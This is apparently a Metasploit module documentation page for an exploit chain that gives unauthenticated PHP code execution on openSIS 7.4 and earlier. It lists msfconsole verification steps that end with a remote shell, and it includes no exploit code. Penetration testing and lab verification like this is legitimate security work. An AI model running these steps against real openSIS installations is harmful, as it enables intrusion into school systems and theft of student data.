Path: blob/master/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md
Vulnerable Application
This module exploits multiple vulnerabilities in openSIS 7.4 and prior versions which could be abused by unauthenticated attackers to execute arbitrary PHP code. It is based on these advisories:
The module has been successfully tested against openSIS versions 7.3 and 7.4 running on Ubuntu. Older versions might be affected as well.
Download link: https://sourceforge.net/projects/opensis-ce/files/
Verification Steps
1. Install the web application
2. Start msfconsole
3. Do: use unix/webapp/opensis_chain_exec
4. Do: set RHOSTS [IP]
5. Do: set TARGETURI [/path/to/opensis]
6. Do: run
7. You should get a shell.
Options
TARGETURI
The base path to the web application (e.g. /opensis/). The default value is /.
Scenarios
openSIS 7.4 running on Ubuntu 18.04.4